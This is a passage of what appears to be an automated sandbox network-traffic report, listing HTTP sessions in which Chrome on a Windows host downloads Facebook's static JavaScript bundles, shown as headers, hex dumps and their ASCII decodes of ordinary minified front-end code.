                                                                                                                                                                                                                                Data Ascii: &(i||(i=c("suspendOrThrowIfUsedInSSR")))("Loading of bootloaded and T3 components is disabled during SSR");var d=b.getModuleId();if(!j[d]){b=j[d]=b.load();b["finally"](function(){delete j[d]})}throw j[d]}return a}g.preload=a;g.read=b}),98);__d("CPUPressu
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC16384INData Raw: 3b 0a 5f 5f 64 28 22 4d 65 6d 6f 72 79 55 74 69 6c 73 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 67 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 65 6d 6f 72 79 7d 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 26 26 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 64 65 76 69 63 65 4d 65 6d 6f 72 79 7d 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61
                                                                                                                                                                                                                                Data Ascii: ;__d("MemoryUtils",[],(function(a,b,c,d,e,f){"use strict";function g(){return window.performance&&window.performance.memory}function h(){return window.navigator&&window.navigator.deviceMemory}function a(){return window.performance&&typeof window.performa
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC14884INData Raw: 6c 6c 26 26 28 63 28 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 22 29 28 6c 29 2c 6c 3d 6e 75 6c 6c 29 2c 6d 28 61 2c 62 29 7d 66 75 6e 63 74 69 6f 6e 20 71 28 61 2c 62 29 7b 69 66 28 21 64 28 22 56 69 73 69 62 69 6c 69 74 79 41 50 49 22 29 2e 69 73 56 69 73 69 62 69 6c 69 74 79 48 69 64 64 65 6e 28 29 26 26 6f 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 6f 3b 62 26 26 28 6b 3d 7b 61 66 66 65 63 74 65 64 49 6e 74 65 72 61 63 74 69 6f 6e 73 3a 5b 5d 2c 6d 65 74 72 69 63 73 3a 63 28 22 4f 6e 65 54 72 61 63 65 43 6f 72 65 22 29 2e 73 74 61 72 74 54 72 61 63 65 28 63 28 22 75 75 69 64 76 34 22 29 28 29 2c 61 2c 22 52 45 53 50 4f 4e 53 49 56 45 4e 45 53 53 22 2c 63 28 22 70 65 72 66 6f 72 6d 61 6e 63 65 4e 6f 77 53 69 6e 63 65 41
                                                                                                                                                                                                                                Data Ascii: ll&&(c("clearInterval")(l),l=null),m(a,b)}function q(a,b){if(!d("VisibilityAPI").isVisibilityHidden()&&o){var e=function(){var b=o;b&&(k={affectedInteractions:[],metrics:c("OneTraceCore").startTrace(c("uuidv4")(),a,"RESPONSIVENESS",c("performanceNowSinceA


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                70192.168.2.449821157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC374OUTGET /rsrc.php/v3/yC/r/9NORmZkKZyv.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: /HmydUFwcPwAUig9l7tbMQ==
                                                                                                                                                                                                                                Expires: Sat, 20 Sep 2025 09:58:34 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: tn3B54XRcP3OpXaT8T7swa6bWeoumqMlQ7UkHbP6ICZ+T9QJMwV2Z6qp7z5fcAb490c/GcJzDfXWZhGvyp3nHQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:23 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 59956
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC15873INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 43 4c 53 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 67 3d 74 79 70 65 6f 66 20 28 28 62 3d 77 69 6e 64 6f 77 2e 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 28 63 3d 62 2e 73 75 70 70 6f 72 74 65 64 45 6e 74 72 79 54 79 70 65 73 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 69 6e 63 6c 75 64 65 73 29 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 77 69 6e 64 6f 77 2e 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 2e 73 75 70 70 6f 72 74 65 64 45 6e 74 72 79 54 79 70 65 73 2e 69 6e 63 6c 75 64 65 73 28 22 6c 61 79 6f 75 74 2d 73
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("CLS",[],(function(a,b,c,d,e,f){"use strict";var g=typeof ((b=window.PerformanceObserver)==null?void 0:(c=b.supportedEntryTypes)==null?void 0:c.includes)==="function"&&window.PerformanceObserver.supportedEntryTypes.includes("layout-s
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC16384INData Raw: 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 63 3d 61 2e 65 6c 65 6d 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 63 6c 61 73 73 4e 61 6d 65 2c 65 6c 65 6d 65 6e 74 3a 28 63 3d 61 2e 65 6c 65 6d 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 74 61 67 4e 61 6d 65 2c 73 69 7a 65 3a 61 2e 73 69 7a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 61 2e 73 74 61 72 74 54 69 6d 65 2c 75 72 6c 3a 61 2e 75 72 6c 7d 7d 7d 66 2e 67 65 74 4c 43 50 43 61 6c 6c 62 61 63 6b 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 52 65 73 6f 75 72 63 65 44 6f 77 6e 6c 6f 61 64 4c 6f 67 67 65 72 22 2c 5b 22 70 65 72 66 6f 72 6d 61 6e 63 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74
                                                                                                                                                                                                                                Data Ascii: =null?null:{className:(c=a.element)==null?void 0:c.className,element:(c=a.element)==null?void 0:c.tagName,size:a.size,timestamp:a.startTime,url:a.url}}}f.getLCPCallback=a}),66);__d("ResourceDownloadLogger",["performance"],(function(a,b,c,d,e,f,g){"use st
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC16384INData Raw: 70 50 69 78 65 6c 73 3a 30 2c 63 73 73 42 67 45 6c 65 6d 65 6e 74 73 3a 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 63 73 73 42 67 45 6c 65 6d 65 6e 74 73 2e 76 61 6c 75 65 73 28 29 29 2c 65 6c 65 6d 65 6e 74 73 3a 74 68 69 73 2e 24 32 2c 66 69 6e 61 6c 53 63 72 6f 6c 6c 59 3a 74 68 69 73 2e 24 31 32 2c 69 6d 67 4e 75 6d 3a 30 2c 69 6d 67 50 69 78 65 6c 73 3a 30 2c 69 6e 69 74 69 61 6c 53 63 72 6f 6c 6c 59 3a 74 68 69 73 2e 69 6e 69 74 69 61 6c 53 63 72 6f 6c 6c 59 2c 69 6e 74 65 72 61 63 74 69 6f 6e 54 79 70 65 3a 74 68 69 73 2e 69 6e 74 65 72 61 63 74 69 6f 6e 54 79 70 65 2c 6c 6f 61 64 69 6e 67 45 6c 65 6d 65 6e 74 73 3a 74 68 69 73 2e 24 35 2c 6d 61 72 6b 65 72 50 6f 69 6e 74 73 3a 74 68 69 73 2e 6d 61 72 6b 65 72 50 6f 69 6e 74 73 2c 6e 61 76 43
                                                                                                                                                                                                                                Data Ascii: pPixels:0,cssBgElements:Array.from(this.cssBgElements.values()),elements:this.$2,finalScrollY:this.$12,imgNum:0,imgPixels:0,initialScrollY:this.initialScrollY,interactionType:this.interactionType,loadingElements:this.$5,markerPoints:this.markerPoints,navC
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC11314INData Raw: 65 74 28 61 29 3b 69 66 28 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 62 2e 63 61 6c 6c 62 61 63 6b 28 29 3b 62 2e 65 78 65 63 75 74 65 4f 6e 63 65 26 26 6a 2e 24 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 54 72 61 63 69 6e 67 24 70 5f 38 5b 22 64 65 6c 65 74 65 22 5d 28 61 29 7d 29 7d 3b 64 28 22 57 65 62 41 50 49 73 22 29 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 26 26 28 6a 2e 6d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 3d 6e 65 77 28 64 28 22 57 65 62 41 50 49 73 22 29 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 29 28 6a 2e 6d 75 74 61 74 69 6f 6e 52 65 63 6f 72 64 48 61 6e 64 6c 65 72 29 29 3b 64 28 22 57 65 62 41 50 49 73 22 29 2e 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 26 26 28 6a 2e 6c 6f 61 64 69 6e
                                                                                                                                                                                                                                Data Ascii: et(a);if(b==null)return;b.callback();b.executeOnce&&j.$VisualCompletionTracing$p_8["delete"](a)})};d("WebAPIs").MutationObserver&&(j.mutationObserver=new(d("WebAPIs").MutationObserver)(j.mutationRecordHandler));d("WebAPIs").IntersectionObserver&&(j.loadin


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                71192.168.2.449822157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC374OUTGET /rsrc.php/v3/yK/r/lNInKxOqejp.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: dPGOafzutFE7nyQyK+c4bg==
                                                                                                                                                                                                                                Expires: Thu, 18 Sep 2025 17:55:51 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: DYQTshcOa5gOex58iuFPLI2XNL/hq4npMf6qY+p4H15TqgNSqMTx1SJMUuczHZkHidLHwJ6r90AUZqsCHmndQw==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:23 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=5, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 10408
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC10407INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 2f 56 39 76 64 59 43 6f 6c 63 34 6b 2f 0a 20 2a 2f 0a 5f 5f 64 28 22 72 65 61 63 74 2d 30 2e 30 2e 30 22 2c 5b 22 52 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 74 79 70 65 6f 66 20 61 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 22 64 65 66 61 75 6c 74 22 69 6e 20 61 3f 61 5b 22 64 65 66 61 75 6c 74 22 5d 3a 61 7d 76 61 72 20 67 3d 61 28 62 28 22 52 65 61 63 74 22 29 29 3b 64 3d 7b 7d 3b 76 61
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*//** * License: https://www.facebook.com/legal/license/V9vdYColc4k/ */__d("react-0.0.0",["React"],(function(a,b,c,d,e,f){"use strict";function a(a){return a&&typeof a==="object"&&"default"in a?a["default"]:a}var g=a(b("React"));d={};va


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                72192.168.2.449823157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC385OUTGET /rsrc.php/v3i-G34/yn/l/ru_RU/Td5hkdtkXX5.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC1931INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: d47OlUqeaNvCHt+edjdQkA==
                                                                                                                                                                                                                                Expires: Mon, 29 Sep 2025 04:53:23 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: kJyHR9QesrtYd5C+ZzyS7KIbiw7dDBwDrgQuLu822rFXhGjndMnWAYcDzo2EORyCq/IenIvF52tsbGtEwuW+5A==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:24 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 356545
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC15859INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 63 74 69 76 65 46 6f 63 75 73 52 65 67 69 6f 6e 55 74 69 6c 73 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3b 61 3d 68 7c 7c 64 28 22 72 65 61 63 74 22 29 3b 62 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 6e 75 6c 6c 29 3b 63 3d 62 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 63 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 42 61 73 65 43 68 61 6d 65 6c 65 6f 6e 54 68 65 6d 65 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("ActiveFocusRegionUtilsContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);c=b;g["default"]=c}),98);__d("BaseChameleonThemeContext",["react"],(function(a,b,c,d,e,f,g){"use strict";v
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC16384INData Raw: 65 6f 66 20 65 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 28 65 2e 63 61 6c 6c 28 61 2c 62 3f 64 2e 76 61 6c 75 65 3a 2d 31 29 2c 64 2e 63 61 6e 54 61 62 3d 62 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 76 61 72 20 62 3d 61 2e 5f 74 61 62 49 6e 64 65 78 53 74 61 74 65 3b 69 66 28 21 62 29 72 65 74 75 72 6e 20 61 2e 74 61 62 49 6e 64 65 78 3e 30 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 62 2e 63 61 6e 54 61 62 7d 66 2e 73 65 74 45 6c 65 6d 65 6e 74 43 61 6e 54 61 62 3d 61 3b 66 2e 63 61 6e 45 6c 65 6d 65 6e 74 54 61 62 3d 62 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 46 6f 63 75 73 52 65 67 69 6f 6e 2e 72 65 61 63 74 22 2c 5b 22 41 63 74 69 76 65 46 6f 63 75 73 52 65 67 69 6f 6e 55 74 69 6c 73 43 6f 6e 74 65 78 74 22 2c 22 46 6f 63 75 73 4d 61 6e 61 67 65
                                                                                                                                                                                                                                Data Ascii: eof e==="function"&&(e.call(a,b?d.value:-1),d.canTab=b)}function b(a){var b=a._tabIndexState;if(!b)return a.tabIndex>0;else return b.canTab}f.setElementCanTab=a;f.canElementTab=b}),66);__d("FocusRegion.react",["ActiveFocusRegionUtilsContext","FocusManage
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC16384INData Raw: 3b 0a 5f 5f 64 28 22 75 73 65 57 65 62 50 72 65 73 73 61 62 6c 65 54 6f 75 63 68 53 74 61 72 74 48 61 6e 64 6c 65 72 22 2c 5b 22 55 73 65 72 41 67 65 6e 74 22 2c 22 70 61 73 73 69 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 55 74 69 6c 22 2c 22 72 65 61 63 74 22 2c 22 75 73 65 44 79 6e 61 6d 69 63 43 61 6c 6c 62 61 63 6b 44 41 4e 47 45 52 4f 55 53 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 2c 69 3d 28 68 7c 7c 64 28 22 72 65 61 63 74 22 29 29 2e 75 73 65 45 66 66 65 63 74 3b 62 3d 63 28 22 55 73 65 72 41 67 65 6e 74 22 29 2e 69 73 42 72 6f 77 73 65 72 28 22 53 61 66 61 72 69 22 29 7c 7c 63 28 22 55 73 65 72 41 67 65 6e 74 22 29 2e 69 73 42 72 6f 77 73 65 72 28
                                                                                                                                                                                                                                Data Ascii: ;__d("useWebPressableTouchStartHandler",["UserAgent","passiveEventListenerUtil","react","useDynamicCallbackDANGEROUS"],(function(a,b,c,d,e,f,g){"use strict";var h,i=(h||d("react")).useEffect;b=c("UserAgent").isBrowser("Safari")||c("UserAgent").isBrowser(
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC16384INData Raw: 63 74 69 6f 6e 22 29 29 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 43 6f 6d 65 74 46 65 65 64 4c 6f 67 67 69 6e 67 45 78 74 72 61 46 69 65 6c 64 73 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3b 61 3d 68 7c 7c 64 28 22 72 65 61 63 74 22 29 3b 62 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 7b 7d 29 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 43 6f 6d 65 74 54 72 61 63 6b 69 6e 67 43 6f 64 65 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73
                                                                                                                                                                                                                                Data Ascii: ction"));g["default"]=b}),98);__d("CometFeedLoggingExtraFieldsContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext({});g["default"]=b}),98);__d("CometTrackingCodeContext",["react"],(function(a,b,c,d,e,f,g){"us
